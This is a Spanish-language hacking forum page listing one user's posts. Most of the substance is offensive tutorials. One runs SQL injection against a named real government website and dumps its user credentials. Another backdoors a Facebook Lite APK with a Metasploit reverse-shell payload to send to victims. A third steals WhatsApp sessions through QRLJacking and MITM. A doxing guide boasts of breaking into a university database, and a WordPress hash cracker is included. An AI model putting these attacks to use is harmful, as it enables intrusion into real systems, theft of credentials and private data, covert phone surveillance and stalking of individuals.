Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - BrowserNet

#21
Off Topic / !!Regrese hermanos !!!!
Febrero 13, 2017, 01:28:00 PM
Is come back ! hermanos regreso el TioCyberPunks a publicar mas POST  8) !!
cuantos me extrañaron :(
#22
lastimosamente que en algunos APK no funcione.

Saludos.
#23
GNU/Linux / Re:[Distro] LionSec Linux 5.0
Diciembre 31, 2016, 10:16:56 PM
Buena distro lo probé y me encanto.

posdata: esos que encuentran XSS en paginas me dan lastima eh visto que existen algunos en el foro que solamente encuentran "XSS" y se  autodenominan "profesionales de la seguridad informática" y por imbox están que te dicen ayúdame con cobalstrike jaja


Saludos!
#24
Saludos compañeros estoy entrando al mundillo de la programación enfocándome en el lenguaje C# ya que para mi es un lenguaje muy sencillo de aprender, ustedes saben a lo que me refiero.

Lo que deseo es proteger el código fuente del ejecutable, antes de venderlo a un cliente.
se que esa respuesta la puedo encontrar en google, pero prefiero guiarme de personas de confianza y sobre todo de gente experimentada en este tipo de información, con mis hermanos.


Espero me ayuden.
un saludo.
#25
Off Topic / Re:Me despido.
Diciembre 12, 2016, 11:11:42 PM
Gracias a todos los presentes por sus mensajes, fue un agrado tenerlos como hermanos en esta comunidad por mi parte espero volver nuevamente a compartir lo que se y aprender de cada uno de ustedes.

como lo dice nuestro amigo "hu3c0" es verdad en esta vida siempre encontraras ovejas negras y blancas.
Un abrazo enorme para todos desde Perù.


Saludos!
#26
Off Topic / Me despido.
Diciembre 11, 2016, 05:59:16 AM
Buenos dias familia de underc0de, se que a muchos no les importara y otros simplemente les agradara la noticia pero me alejare del foro por motivos personales y algunos puntos que no me agradan de la comunidad.

Gracias por su recibimiento, estoy en deuda con todos.



Saludos.

#27
Hacking / SQL Inyeccion con DarkMySQLi
Diciembre 07, 2016, 03:25:07 AM


DarkMySQLi es una herramienta de código abierto creada en python, que nos permite elaborar un ataque de SQL INJECTION de forma automátizada y extraer la información de las base de datos de una web.

Link de descarga : No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Vamos a la acción



El primer paso que haremos primero sera encontrar la web vulnerable en este caso utilizare la siguiente :

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Ejecutaremos el siguiente comando para el testeo de la web :

Código: text
python darkMySQLi.py -u "http://www.regionsanmartin.gob.pe/institucional/ini.php?Area=3" --findcol




como vemos nos voto la información principal para saber si es vulnerable a la Inyección DarkMySQLi  :

[!] darkMySQLi URL: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

luego que sabemos que es vulnerable a la inyección pondremos el siguiente:

Código: text
python darkMySQLi.py -u "http://www.regionsanmartin.gob.pe/institucional/ini.php?Area=3+AND+1=2+UNION+SELECT+1,2,darkc0de,4--" --full


(solo reemplazamos el numero " 3 " por " darkc0de "




Como vemos nos a votado las columnas de las base de datos clasificándolas por cada uno de ellas en sus respectivas "tablas" de manera que podamos identificarlos fácilmente los datos almacenados.

Lo que haremos a continuación sera dumpear las columnas de los usuarios:

Código: text
python darkMySQLi.py -u "http://www.regionsanmartin.gob.pe/institucional/ini.php?Area=3+AND+1=2+UNION+SELECT+1,2,darkc0de,4--" --dump -D regionsanmartin_gob_pe -T usuarios -C nomb_usuario,pass,tipo_usuario




Imagen completa de usuarios



Espero les aya gustado mucho el Post, un saludo y un abrazo desde PERU"
#28
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Buena data, esto me hace acordar a otro famoso root exploit que cuando salio a ala luz ya tenia años de ser utilizado claro en un circulo cerrado de atacantes que lo tenían hasta que lo liberan (hasta eso ya rootearon miles de servidores) xD.
como recomendación a tu post te diria que quites esa parte que dice: "las consecuencias que con lleva son catastróficas, permite al atacante obtener privilegios root de manera remota"... ya que a simple vista el exploit tiene que ser ejecutado desde dentro del servidor siendo mas bien un "local root exploit" y quizás esto se preste para confusión.

Saludos!, EPSILON.

jejeje, me comi el local root exploit y por una pequeña confusion añadi forma remota, me retracto gracias por su colaboracion mi buen amigo, un saludo y un fuerte abrazo.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Ya la había publicado un post sobre esto :v

si vi tu post hermano, por eso le quize aumentar las tecnicas de penetracion a un sistema GNU por medio de un payload, para poder ejecutar el root exploit, un saludo mi bro!
#29
Python / Re:Brute force en HASH MD5 Wodpress old
Diciembre 04, 2016, 01:35:17 PM
muchas gracias por su consejo bro, ante mano un placer que me halla respondido.

un fuerte abrazo desde Perú hermano y daré todo lo mejor de mi para conseguir este reconocimiento, que tenga un buen día.
#30
Python / Brute force en HASH MD5 Wodpress old
Diciembre 04, 2016, 08:22:08 AM
Saludos gente de underc0de, buenos dias sigo sin dormir y estoy pensando en hacer post cortos en el foro sin colgarlos a mi blog, si no directamente postearlos aqui con la comunidad  8)

en fin, he estado investigando en el foro que muchos usuarios nuevos piden como descifrar el robusto HASH de wordpress, de ante mano deseo añadir este articulo ha pedido de nuestros nuevos colegas,

Vamos a guardar el archivo con extensión python en nuestro sistema.

Código: text
#!/usr/bin/python
#--------------------------------------------------------
#~Wordpress Hash Cracker
#~By Cyb3rw0rM
#~Visit us on facebook for more scripts: https://www.facebook.com/BackTrack.Fan.Page
#~We love Pentesting
#--------------------------------------------------------
from passlib.hash import phpass
import time
import sys
import threading
#--------------------------------------------------------
class bcolors:
    HEADER = '\033[95m'
    OKBLUE = '\033[94m'
    OKGREEN = '\033[92m'
    WARNING = '\033[93m'
    FAIL = '\033[91m'
    ENDC = '\033[0m'
#--------------------------------------------------------
def logo():
    print bcolors.WARNING+ '''       


   ______      __   _____               ____       __  ___
  / ____/_  __/ /_ |__  /______      __/ __ \_____/  |/  /
/ /   / / / / __ \ /_ </ ___/ | /| / / / / / ___/ /|_/ /
/ /___/ /_/ / /_/ /__/ / /   | |/ |/ / /_/ / /  / /  / / 
\____/\__, /_.___/____/_/    |__/|__/\____/_/  /_/  /_/   
     /____/                                               
          Wordpress Hash Cracker
     By Cyb3rw0rM
       #BackTrack Linux Fan Page
'''
logo()
#--------------------------------------------------------
hash =  raw_input("Hash > ") #~exemple : $P$BNUagMlYbp6Zr.yCTsszsPhco663Wf0
passl = "wordlist.txt" #~change it by wordlist name
threads = 1
try:
    plist = open(passl).readlines()
except:
    print bcolors.FAIL + "| We cant find 1 required list !"
#--------------------------------------------------------
def crack(password):
    hashed = phpass.verify(password, hash)
    hashedpass = str(hashed) + ":" + str(password)
    if hashedpass == "True:" + password :
    print bcolors.OKGREEN + "+---------------------------------------+"
    print bcolors.OKGREEN + "| Operation Completed !"
    print bcolors.OKGREEN + "| HASH > " + " " + hash
    print bcolors.OKGREEN + "| password >" + " " + password
    print bcolors.OKGREEN + "+---------------------------------------+"
    sys.exit(1)
#--------------------------------------------------------
print bcolors.OKBLUE + "+---------------------------------------+"
print bcolors.OKBLUE + "| Cracking Please Wait ..."
print bcolors.OKBLUE + "| Loaded %s passwords !" % len(plist)
print bcolors.OKBLUE + "+---------------------------------------+"
for password in plist :
    password = password.rstrip()
    for i in xrange(threads):
        t = threading.Thread(target=crack(password))
        t.start()
#--------------------------------------------------------


Una ves descargado, debemos tener nuestro diccionario en nuestro caso debemos llamarlo "wordlist.txt" ya que esta "relacionado" con el objeto passl, bueno usted lo puede modificar pero en fin.

Utilizare este diccionario para elaborar la prueba de concepto, es corto el diccionario ya que solo probaremos la funcionalidad de la herramienta.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

nuestro hash de prueba es: $P$B55D6LjfHDkINU5wF.v2BuuzO0/XPk/



El hash fue descifrado con éxito, usted puede utilizar un diccionario extenso, pero ojo eso dependerá de la capacidad de tu computador. 
espero les halla gustado este POST.

posdata: me animo a ser moderador de un área, cualquier consulta estoy disponible claro, si nuestro buen hermano y administrador @ANTRAX lo permite.
Un Saludo.
#31
Diseño UX/UI / Re:Pide tu firma Underc0de!
Diciembre 04, 2016, 04:51:53 AM
Hola @No tienes permitido ver los links. Registrarse o Entrar a mi cuenta deseo tener mi firma me lo puede enviar, me encantaria que el modelo sea de fondo negro y las letras de color rojo.

Saludos!  8) 8)
#32
Seguridad / Aprendiendo el arte del Doxing intermedio
Diciembre 04, 2016, 02:24:08 AM



Saludos mis hermanos de underc0de. este  POST les encantara, esta oportunidad enseñare algunos métodos de doxing la cual nos puede servir de utilidad para investigar a una persona detrás de una identidad falsa o seu-identidad,para obtener todos los datos reales de nuestra victima como:


    Nombres y apellidos
    Dni
    Edad
    Sexo
    Centros de educación
    Identificación de correo electrónico
    Dirección de ubigeo
    Número de teléfono
    Amigos en común
    Familiares

¿Que es el doxing o doxeo?

En esta oportunidad quisiera darle paso a el concepto de un amigo mio con el seudónimo :
Hiro Maxwell , el cual me enseño hace poco como se elaboraba un escenario de doxeo y me gustaría agradecerle en este humilde POST su enseñanza que me brindo, ya que hasta el día de hoy me ha servido para mis investigaciones sobre personas fraudulentas.Doxing es obtener la mayor cantidad de datos posibles acerca de una persona/objetivo a partir de UNO,POCOS o MUCHOS datos (osea, a partir de cualquier cosa).

De acuerdo a ello podemos definir que el doxing es un ataque dirigido a datos mínimos de un objetivo la cual se pasara en una serie de investigaciones obteniendo datos grandes de datos pequeños.

Hoy en día existen muchas aplicaciones web, que nos pueden ayudar a facilitar la búsqueda de personas que nos puede ser de gran utilidad para nuestras investigaciones, no obstante podemos aprovechar  "Google", ya que gracias a este buscador tenemos millones de palabras indexeadas que nos pueden facilitar mas aun nuestro trabajo, de igual manera google ah añadido una búsqueda de imágenes que puede ser el santo brial para los Doxing.

En esta prueba de concepto  no haré la búsqueda con un alias  o personas por seguridad, me enfocare en algo mas liviano como alguien con el seudónimo "RootByte", la cual me autorizo su nombre en esta prueba,haré como si no lo conociera y solo me enfocare en buscar el seudónimo mencionado. bueno vayamos a la acción.

Escenario de investigación

Como bien dije hace momentos google puede ser una arma secreta muy creativa si se sabe utilizar los parámetros de búsqueda correctos, lo que haremos sera ver si el tal RootByte tiene una cuenta de facebook o fan page relacionada,

RootByte site:facebook.com



en solo añadir una pequeña búsqueda de nuestro objetivo enfocada en la red social Facebook, podemos observar mas de 3,260 resultados que nos pueden facilitar nuestra investigación en esa red interna, si el objetivo tuviera el nick en su perfil ya sabríamos quien es, pero como sabemos que nuestro objetivo es una persona con algo de popularidad en el ambiente lo que haremos sera utilizar una búsqueda en Plus Google, que es el servidor de cuentas de Gmail enlazadas a canales de Youtube y blogs.

RootByte site:plus.google.com



como vemos observar hay un diminutivo adjunto a RootByte & Johnny, lo que hare sera entrar a la cuenta y ver que información puedo obtener mas aya de un nombre que puede ser real.



Como vemos el objetivo tiene  un solo video, pero sean observadores algunas personas por descuido dejan mas datos de lo que pueden ser aprovechados como por ejemplo, arriba nos aparece un logotipo de Facebook,Google y un enlazado a un sitio web.





oh :( , ya no existen esas cuentas o quizás fueron removidas u editadas, ya que esos datos datan de hace mas de 2 años, que en su tiempo pudo ser jugosa, entonces seguiremos con nuestra investigación hasta encontrar el nombre del objetivo, como sabemos Johnny es un diminutivo de Jhonathan, entonces enfoquemosnos en  buscar el nombre Jhonathan adjuntado con RootByte en google.




podemos observar que hay mas de 1600 resultados de esas palabras adjuntas con el nombre del seudonimo RootByte llamado Jhonathan Paz

Algunas web asociadas del objetivo:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Existen servidor web que nos felicitaran nuestra búsqueda en redes sociales donde mayormente las personas tienen un error de publicar mas de lo que se debe.



Skypepese: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Para mi esta web es una de mas completas en redes sociales ya que podemos obtener una búsqueda manual del objetivo, ya que al buscar un red social nos arrojara el dork de búsqueda que la mayoría de estos servicios tiene como estructura,en la cual podemos intelectuar de manera muy sencilla.

Pipl No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

de igual manera este servicio sin duda seria de gran ayuda ya que nos lanzaría resultados aleatorios de las web de red social mas utilizadas con gráficos que nos serian de ayuda.



Otros servicios donde pueden realizar una buena búsqueda son las siguientes: 

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta >>> consta con varias búsquedas de países donde nos resultara de maravilla.

Entre mucha mas información que obtuve de mi objetivo utilizando búsquedas mas avanzadas ya que obtenido datos de familiares, novia, ubicación de real, entre otras las cuales no puedo mostrar por respeto al acuerdo que se hizo con RootByte.

Supongamos que no hemos realizado nada de la investigación y solo tenemos una foto del objetivo:



como bien sabemos google ha implementando una búsqueda nueva que es por Imagen, lo que haremos sera subir esta foto a nube del buscador y esperar los datos que nos arroje.



No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

si nuestro objetivo que deseamos buscar tiene la foto en una referencia de una cuenta de red social o simplemente añadido en un contacto de su entorno, daríamos con el bingo !, en nuestro caso ya sabemos quien es esta persona y empezaríamos a recopilar mas información de la que sabemos o también podemos utilizar una herramienta de recopilación mas grande de informathion gathering
llamado "Maltego"



No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

En mi caso hace poco hice un doxing a una persona "X",pero primero me enfoque a un objetivo familiar que me ayudo a encontrarlo , esta es una FOTO de un Doxing real hecho por mi persona.





este objetivo fue una persona "Familiar" , que me brindo ubicar a mi objetivo central, en mi caso utilice algunas técnicas de google,buscadores de redes sociales y maltego para rematar al objetivo mediante un análisis estructurado.



de acuerdo con la investigación de las personas familiarizadas al objetivo que esta oculto por su seguridad, pude obtener todos los datos de esa persona, como DNI,ubicación,familiares,casa,teléfonos,entre muchas cosas privadas de el, y para darle el tiro de gracia a mi objetivo entre a la BASE DE DATOS de su universidad  para encontrar los datos y me confirmaron que si era el objetivo correcto :)

Vulnerabilidad nueva en la plataforma reciente de dicha universidad :

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

hace poco hice un post sobre como un dump y una red social nos puede ayudar de mucho para encontrar y obtener datos de personas :

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

pero como lo dije no mostrare datos de las personas, porque no quiero perjudicar a nadie con este POST, porque si lo hubiera hecho ya los hubiera subido a las web conocidas de datos de Doxing:




No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Pero en mi caso, no puedo hacerlo ya que un estimo a este colega mio y no quiero perjudicarlo en nada, ya que tengo una amistad de años con este tipo, pero lo mejor seria alejarme un poco tiempo para que se calmen las aguas y volver a retomar la amistad dejando en claro algunos puntos.

Espero les aya gustado este POST, deseo aclarar que el doxing es un rama de investigación de como uno puede pensar e investigar del modo que sea del agrado del usuario, SALUDOS

#33


Saludos fieles lectores en esta oportunidad les traigo  una nueva herramienta salida del horno, que nos permite optimizar el proceso de robo de sesión por medio del código QR, hace una semana tuve un pequeño concurso en mi salón entre 3 proyectos innovadores, yo había elaborado un Software de identificación de medidas dactilares creado en Csharp conectado a un motor de base de datos como "SQL SERVER"  + SDK digital personal, por lo cual tenia 2 grandes rivales.

un proyecto de realidad aumentada y otro basado en suscripción e inicio de sesión de usuarios por medio de código QR.

El ultimo día de exposición era un debate, en la cual se tenia que ver la manera de como matar el proyecto del contrincante buscando que fallas puede tener, entonces comente sobre el Robo de sesiones QRJacking.



Descarga:

Código: text
root@kali:~#  git clone https://github.com/OWASP/QRLJacking.git
root@kali:~#  cd QRLJacking/QrlJacking-Framework
root@kali:~#  pip install -r requirements.txt




Luego de haber descargado los archivos e instalado los requerimientos de las librerias en python, pasaremos a ejecutarlo:

Código: text
root@kali:~#  python QRLJacker.py




Lo que haremos sera añadir la opción nuevo 1, Chat Applications, nuevamente escogeremos la opción 1 que es "WhatsApp", luego de ello nos aparecerá lo siguiente :

Port to listen on (Default 1337) :

Nos dice que puerto de escucha deseamos agregar para que corre la plataforma, en mi caso le añadí el puerto 8081.

Muy bien una ves hecho todo el procedimiento les saldra lo siguiente:



vemos que nos abrió una pestaña en firefox con la web original: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

de igual manera en la terminal vemos que se generan varios reemplazos del archivo tmp.png, para resumir esto es que en la plataforma de whatsapp web cada 10 segundos se genera otro nuevo código QR por ende otra imagen y QRLJacking actualiza esa imagen en vivo para que la conexión sea exitosa.



Entonces como esta es una prueba de Test, deje la index.html de whatssap generado por QRLJacking por default.

si ustedes desean editarla es demasiado sencilla, se van al siguiente directorio:

Código: text
root@kali:~#  cd QRLJacking/QrlJacking-Framework




Entonces una ves que mi victima abra la pestaña de mi servidor malicioso, empezara a escanear el código :



En el momento precioso que la victima escanee el código, nosotros tendremos su sesión en segundo plano:



Muy sencillo verdad, ahora tu te preguntaras como mandar su servidor malicioso a tus vecinos que estén conectados a tu red, muy simple puedes ejecutar un MITM - dnspoof.

Con bettercap, MITMF, Xerosploit, Pythem!, hasta con el mismo Ettercap, si deseas ownear el sistema de tu victima te recomiendo utilizar Beef con cualquiera de las herramientas mencionadas y hacer la redirección en dicho framework:

Les dejare 2 posts,donde enseño a elaborar un MITM y utilizar el framework:


No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Saludos!!!!!!
#34


Saludos nuevamente mis fieles lectores, en esta oportunidad no les traigo un POST como los de costumbre si no un arsenal de sistemas operativos orientados a la rama de la "Seguridad Informática" ha pedido de varios seguidores de mi fan page: CyberPunks Hackers 2007 - 2015.

Voy a dejar bien claro lo siguiente, hasta hace días atrás eh escuchado comentarios de estudiantes y algunas personas que dictan clases de seguridad informática, recomendar "Backtrack R3" por todos los santos, no utilices un sistema descontinuado y antiguo por el simple hecho que tiene muchos fallos de seguridad y puertas traseras descubiertas a lo largo de estos años, no solamente me refiero a Backtrack, si no también a las versiones primitivas de Kali Linux, les recomiendo utilizar la versión 2016.1 o 2016.2, actualicen siempre sus sistemas y servicios que tengan, ustedes saben que un sistema actualizado nace por un fallo en su versión anterior.

Bueno comencemos con este TOP, posdata: no utilicen "Wintendo" por nada del mundo, jamas utilices software privativo que tienen muchas puertas traseras y solo sirven para "comercializar".

Sistemas para Pentesters

"Kali Linux"

Inicio de Kali Linux, una distribución de Linux Prueba de Penetración avanzada utilizada para pruebas de penetración, Hacking Ético y las evaluaciones de seguridad de red.

Se lo simplificare de la siguiente manera Kali linux, es la continuación de Backtrack.

Descarga:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Si deseas emularlo en una maquina virtual como "Vmware" o "Virtualbox", puede descargarlo aqui:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Consejo - escoger su arquitectura correcta.



"Parrot Security OS"

la distribución de Seguridad de GNU / Linux diseñado con pentesting nube y la seguridad de la IO en mente.

Incluye un laboratorio portátil completo para los expertos en seguridad y forenses digitales, sino que también incluye todo lo que necesita para desarrollar sus propios programas o proteger su privacidad con herramientas de anonimato y cifrado.

Este sistema operativo tomo fuerzas a principios del año pasado, sin duda un sistema que tiene mucho por mostrar y sobre todo mejorar.

Descarga:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta



"BlackArch Linux"

BlackArch Linux es una distribución de pruebas de penetración basado en Linux del arco por pruebas de penetración y los investigadores de seguridad. El depósito contiene 1570 herramientas. Puede instalar las herramientas de forma individual o en grupos. BlackArch Linux es compatible con los actuales repertorios y servicios.

Descarga:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta



"LIONSEC"

LionSec Linux 5.0 es una distribución basada en Ubuntu pruebas de penetración. Fue construido con el fin de llevar a cabo la informática forense, pruebas de penetración, análisis inalámbrica. Con el "Modo Anónimo", se puede navegar por Internet o enviar paquetes de forma anónima. Hay un montón de herramientas incorporadas como netool, websploit, burpsuite, herramientas de análisis web, herramientas de ingeniería social y otras herramientas Pentesting.

Descarga:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Este sistema operativo, fue creado por un conocido mio "LionSec", miembro del foro "Underc0de" - una comunidad con el único fin de compartir conocimientos Informáticos.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


"Drac0S"

es el sistema operativo Linux de la fuente de Indonesia, abierto construido en base a la Linux From Scratch bajo la protección de la v3.0 Licencia Pública General de GNU. Este sistema operativo es una variante de las distribuciones de Linux, que se utiliza para realizar pruebas de seguridad (pruebas de penetración). Linux Dracos en el brazo por cientos PenTest hidráulica, medicina forense y la ingeniería inversa. No utiliza una interfaz gráfica de usuario basada en herramientas-herramientas y sólo tienen el software utilizando el (interfaz de línea de comandos) CLI para realizar sus operaciones.

Descarga:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta



"BackBox"

es una distribución Linux basada en Ubuntu. Ha sido desarrollado para realizar pruebas de penetración y las evaluaciones de seguridad. Diseñado para ser rápido, fácil de usar y proporcionan un entorno de escritorio mínimo pero completo, gracias a sus propios repositorios de software, siempre están actualizando a la última versión estable de las herramientas de hacking ético más utilizados y conocidos.

Descarga:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta



Sistemas de Anonimato

En esta sección tenemos los sistemas operativos basados en capas de seguridad entre protocolos de red conectados a SOCKS como tor, privoxy, las cuales trabajan con "NODOS", como también encontraremos servicios "VPN"(Virtual Private Networks) servidores privados de anonimato.

¿Existen sistemas que me ayuden a minimizar mi riesgo de ser descubierto?
Mi respuesta es si, minimizar es el termino correcto que se puede redactar, ya que si estas en Internet siempre seras vigilado por una entidad de telecomunicaciones privadas.

comencemos con el siguiente TOP:

Whonix - Anonymous Operating System

Whonix es un sistema operativo de escritorio diseñada para la seguridad avanzada y privacidad. Se aborda de manera realista los ataques mientras se mantiene la facilidad de uso. Esto hace que sea posible el anonimato en línea a través de su uso a prueba de fallos, automático, y en todo el escritorio de la red Tor. Una base de Debian en gran medida reconfigurado se ejecuta dentro de varias máquinas virtuales, proporcionando una capa sustancial de protección contra fugas de malware e IP. aplicaciones preinstaladas, pre-configurados con los valores predeterminados de seguridad están listas para su uso. Además, la instalación de aplicaciones personalizadas o la personalización del escritorio de ninguna manera poner en peligro al usuario. Whonix es el único sistema operativo desarrollado activamente diseñada para ejecutar dentro de una máquina virtual y se combina con Tor.



Descarga:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta



Tails - The Amnesic Incognito Live System

es un sistema vivo que tiene como objetivo preservar su privacidad y el anonimato. Se le ayuda a utilizar Internet de forma anónima y eludir la censura casi cualquier lugar y en cualquier equipo, pero sin dejar rastro a menos que pida que de forma explícita.

Es un sistema operativo completo, diseñado para ser utilizado desde un DVD, una memoria USB o tarjeta SD de forma independiente del sistema operativo original de la computadora. Es software libre y basada en Debian GNU / Linux.

Descarga:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta



Sin duda un buen arsenal, que deben de utilizar y testearlo personalmente los mencionados fueron utilizados por mi persona, por ende se los recomiendo.

siempre cuando vean que su sistema actual tiene una nueva actualización, utilicen estos 3 simples comandos para actualizar su sistema, repertorios y servicios, para protegerlo de agujeros de seguridad.

Código: text
apt-get update
apt-get upgrade
apt-get dist-upgrade


Actualizar todo tu sistema, te ayudara a minimizar el riesgo de ser Backdorizado por algún Tester.
Sin mas que decir, me despido espero haber aclarado dudas al respecto sobre que sistema operativo es mejor, por mi parte el Kali linux, porque trabaja con el entorno "DEBIAN", que es mi favorito.

Saludos y éxitos!

#35
Hacking / Generando Payload APK persistente con Spade
Diciembre 04, 2016, 01:50:53 AM


Saludos nuevamente x10 :v xD, en esta oportunidad les traigo una herramienta salida del horno llamada "SPADE", esta peculiar herramienta esta desarrollada en Python, su objetivo principal es "Compilar" un Payload en apk mediante una conexión "meterpreter" establecida con el Framework "Metasploit".

continuando con el POST, esta herramienta te ahorra el proceso de crear tu payload con extensión .apk en msfvenom o por el mismo metasploit, automatiza todo el proceso, solo debes añadir tu servidor y  tus puertos como normalmente se añaden tanto en un payload como en un Handle.

Descarga:

Código: text
root@kali:~# git clone https://github.com/suraj-root/spade.git
root@kali:~# cd spade


Luego de descargar y entrar a su carpeta, instalaremos las respectivas librerías para que el software cumpla sus funciones correctamente:

Código: text
root@kali:~# apt-get install lib32stdc++6 lib32ncurses5 and lib32z1 




Una vez completado la instalación de las librerías, deben descargar un aplicativo "APK", donde insertaremos nuestro payload desconpilando el código y procesando la información de la conexión, que haremos desde ese aplicativo infectado creado en spade que se camuflara con el "apk original" en mi caso escogí "Facebook-lite.apk".



Luego de copiar nuestro "APK" descargado en la carpeta raíz "spade", entraremos en nuestra terminal y añadiremos lo siguiente:

Código: text
root@kali:~/spade# ./spade.py facebook-lite.apk




Como vemos en las 3 primeras lineas, hemos añadido nuestro archivo llamado "Facebook-lite.apk" correctamente, luego nos sale las siguientes 6 opciones:

[1] android/meterpreter/reverse_http
[2] android/meterpreter/reverse_https
[3] android/meterpreter/reverse_tcp
[4] android/shell/reverse_http
[5] android/shell/reverse_https
[6] android/shell/reverse_tcp

Son el tipo de conexión que vamos a establecer para conectarnos desde nuestro servidor en mi caso escogí una session meterpreter reverse_http, la cual indico que estoy trabajando con el protocolo http, en la mayoría de conexión se utiliza el reverse_tcp, pero el resultado sera el mismo.

LHOST> 192.168.1.35    >>>>>>> Nuestra IP
LPORT> 8080                 >>>>>>> Nuestro Puerto de escucha

Luego de establecer nuestra configuración del servidor y el puerto de escucha, automáticamente comenzara el proceso de adicionan de permisos en el administrativos.




cuando me refiero a los permisos administrativos, me refiero que tendremos acceso a establecer todo tipo de servicios del dispositivo, entre ellos "Activar la Webcamp", establecer llamadas, extraer números de contactos, de mensajes, y todo lo demás, es mas se puede decir que tendremos mas privilegios que nuestra victima.

Luego que termine todo el proceso de compilamiento, nos aparece el siguiente mensaje:

  • Successfully backdoored and saved as facebook-lite-final.apk

    quiere decir que nuestro ejecutable apk, se creo correctamente con el nombre "facebook-lite-final.apk", El archivo se encuentra en la misma carpeta spade, luego de ello la subiremos a cualquier gestor de descargas y le enviaremos a nuestro victima, luego nos aparecerá el siguiente mensaje:

    Do you want to setup a listener?[y/n]y
    le daremos "Y" para que se inicia metasploit framework con nuestra configuración creada de nuestro payload.



    una ves que tengamos nuestro servidor en modo de escucha, solo faltaría que nuestra victima "Ejecute" el archivo y automáticamente tendremos acceso a su dispositivo móvil:



    Luego que nuestra victima halla instalado nuestro payload, tendremos acceso a su dispositivo.



    hemos comprometido el servidor por medio de un ataque POS-explotacion por medio de un payload infectado, como se los comente ustedes pueden extraer datos de contactos, registro de llamadas, de mensajes de texto, activar la webcamp, y ejercer todas las funciones del dispositivo.

    Cabe aclarar que este payload se genera de forma persistente, si deseas eliminarlo no podrás hacerlo, ha menos que rootes tu dispositivo y lo elimines por ese medio.


    Saludos!!!!!! 



#36


Saludos mis queridos fieles lectores bueno en esta oportunidad deseo aclarar lo siguiente hace mas de 1 año estuve aprendiendo Python pero lamentablemente deje de estudiar ese lenguaje por motivos personales, hace 2 semanas llevo aprendiendo nuevamente las bases y todo lo demás.

Cabe de decir que en todos mis aprendizajes que emplee en mi conocimiento, serán expuestos en el blog para compartir con ustedes mi mejoramiento.

Si deseas aprender python y dar tus primeros pasos en este lenguaje sencillo pero a la vez muy potente, dejare un post que realice hace mucho tiempo.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

¿Qué es Python?

Python es un lenguaje de alto nivel  orientado a objetos, La sintaxis de python   es muy limpia, su código es muy legible y es muy fácil de entenderlo.
Antes de comenzar por favor trata de leer el anterior POST.

Este escenario lo haremos desde el sistema operativo Kali linux - Debian, que por defecto lo tiene instalado, si utilizas un sistema Linux desde 0 puedes utilizar APT para instalarlo desde la terminal.

Código: text
root@kali:~# apt-get install python


Algo que debo mencionar, es que trabajemos con la versión 2.7.X.
Descarga:
Windows: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Mac  OS:  No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Después de tener instalado Python puedes ejecutarlo por la misma terminal:



Cambien puedes utilizar un IDE yo recomiendo Ninja-IDE, lo pueden descargar de su pagina oficial:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

En mi caso tengo que descargar la versión debian en formado .deb, para poder instalarlo.

Código: text
root@kali:~/Downloads# dpkg -i ninja-ide_2.3+r597~saucy1_all.deb 




También puedes instalar Sublime-Text para este escenario, para escribir código y activar su opción Build para poder ejecutar lo que estas programando, pero por mi parte no lo recomiendo, es mejor ejecutarlo por Ninja-IDE O por la terminal el archivo:  python No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Vamos a utilizar algunas librerías dedicadas al manejo de plataformas web, empecemos.

Mechanize:

Es una librería que nos permite interactuar con cualquier plataforma web, como si estuviéramos en un navegador gráfico, ya que manipularemos los envíos de las peticiones en cualquier tipo de instancia.

Mechanize tiene 2 componentes principales:

Browser   -  Nos permite interactuar de manera completa a cualquier servidor web.

Controles - Nos permiten interactuar con  la informacion  de un servicio en su mayoría de codificación html. 



En esta prueba de concepto vamos a elaborar las peticiones desde mi servidor que esta alojado en una maquina virtual corriendo en XAMPP, ustedes pueden observar que la plataforma es "DVWA".

Bien lo que primero haremos, sera añadir la librería en nuestro proyecto de la siguiente manera:

import mechanize
si no  tienes esta librería no te preocupes, puedes instalarla de esta manera desde tu terminal:

pip install mechanize

luego crearemos nuestros objetos para definir nuestras instancias, y empezar a enviar nuestra peticiones.



>>> import mechanize

Importamos nuestra librería mechanize. 

>>> brow = mechanize.Browser()

creamos una instancia del objeto Browser de mechanize, para poder hacer peticiones a los servidores http.

